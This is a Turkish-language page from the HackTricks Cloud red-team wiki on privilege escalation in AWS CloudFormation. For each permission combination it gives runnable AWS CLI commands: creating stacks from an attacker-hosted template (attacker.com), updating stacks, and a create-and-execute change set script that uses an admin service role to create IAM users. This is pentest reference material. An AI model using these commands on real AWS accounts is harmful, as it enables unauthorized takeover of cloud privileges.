AWS - Cloudformation Privesc

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARI'na göz atın!
Resmi PEASS & HackTricks ürünlerini edinin
Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'i keşfedin
💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @hacktricks_live'ı takip edin.
Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.

cloudformation

Cloudformation hakkında daha fazla bilgi için:

`iam:PassRole`, `cloudformation:CreateStack`

Bu izinlere sahip bir saldırgan, özel bir şablonla kendi sunucusunda barındırılan bir CloudFormation yığını oluşturarak, belirtilen bir rolün izinleri altında eylemler gerçekleştirebilir ve böylece yetkileri yükseltebilir:

aws cloudformation create-stack --stack-name <stack-name> \
--template-url http://attacker.com/attackers.template \
--role-arn <arn-role>

Aşağıdaki sayfada, sızma örneği ve ek izin cloudformation:DescribeStacks ile ilgili bir örnek bulunmaktadır:

iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks

Potansiyel Etki: Belirtilen cloudformation hizmet rolüne ayrıcalık yükseltme.

`iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`)

Bu durumda, önceki senaryoda olduğu gibi, mevcut bir cloudformation yığınını kötüye kullanarak güncelleyebilir ve ayrıcalıkları yükseltebilirsiniz.

aws cloudformation update-stack \
--stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
--capabilities CAPABILITY_IAM \
--region eu-west-1

cloudformation:SetStackPolicy izni, bir yığın üzerinde kendinize UpdateStack izni vermek ve saldırıyı gerçekleştirmek için kullanılabilir.

Potansiyel Etki: Belirtilen cloudformation hizmet rolüne ayrıcalık yükseltme.

`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`

Bu izne sahipseniz ancak iam:PassRole izniniz yoksa, yine de kullanılan yığınları güncelleyebilir ve zaten ekli olan IAM Rollerini kötüye kullanabilirsiniz. Saldırı örneği için önceki bölüme bakın (güncellemede herhangi bir rol belirtmeyin).

cloudformation:SetStackPolicy izni, bir yığın üzerinde kendinize UpdateStack izni vermek ve saldırıyı gerçekleştirmek için kullanılabilir.

Potansiyel Etki: Zaten ekli olan cloudformation hizmet rolüne ayrıcalık yükseltme.

`iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)

Bir saldırgan, bir rolü geçme ve bir ChangeSet oluşturma ve yürütme iznine sahip olduğunda, CreateStack veya UpdateStack ile olduğu gibi yeni bir cloudformation yığını oluşturabilir/güncelleyebilir ve cloudformation hizmet rollerini kötüye kullanabilir.

Aşağıdaki saldırı, bir yığın oluşturmak için ChangeSet izinlerini kullanan CreateStack örneğinin bir varyasyonudur.

aws cloudformation create-change-set \
--stack-name privesc \
--change-set-name privesc \
--change-set-type CREATE \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
--capabilities CAPABILITY_IAM \
--region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
--change-set-name privesc \
--stack-name privesc \
--region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1

cloudformation:SetStackPolicy izni, bir yığın üzerinde ChangeSet izinlerini kendinize vermek ve saldırıyı gerçekleştirmek için kullanılabilir.

Potansiyel Etki: CloudFormation hizmet rollerine ayrıcalık yükseltme.

(`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)

Bu, önceki yönteme benzer, ancak IAM rolleri geçirilmeden yapılır, bu nedenle sadece zaten ekli olanları kötüye kullanabilirsiniz, sadece parametreyi değiştirin:

--change-set-type UPDATE

Potansiyel Etki: Zaten eklenmiş olan cloudformation hizmet rolüne ayrıcalık yükseltme.

`iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`)

Bir saldırgan, bu izinleri kötüye kullanarak keyfi cloudformation rollerini kullanmak için StackSet oluşturabilir/güncelleyebilir.

Potansiyel Etki: Cloudformation hizmet rollerine ayrıcalık yükseltme.

`cloudformation:UpdateStackSet`

Bir saldırgan, bu izni passRole izni olmadan kullanarak, ekli cloudformation rollerini kötüye kullanmak için StackSet'i güncelleyebilir.

Potansiyel Etki: Ekli cloudformation rollerine ayrıcalık yükseltme.

Referanslar

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARI'na göz atın!
Resmi PEASS & HackTricks ürünlerini edinin.
Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'yi keşfedin.
💬 Discord grubuna veya telegram grubuna katılın veya bizi Twitter 🐦 @hacktricks_live'da takip edin.
Hacking hilelerinizi paylaşarak HackTricks ve HackTricks Cloud github depolarına PR göndererek katkıda bulunun.

Previousiam:PassRole, codestar:CreateProject Nextiam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks

Last updated 9 months ago

cloudformation

iam:PassRole, cloudformation:CreateStack

iam:PassRole, (cloudformation:UpdateStack | cloudformation:SetStackPolicy)

cloudformation:UpdateStack | cloudformation:SetStackPolicy

iam:PassRole,((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

(cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

iam:PassRole,(cloudformation:CreateStackSet | cloudformation:UpdateStackSet)

cloudformation:UpdateStackSet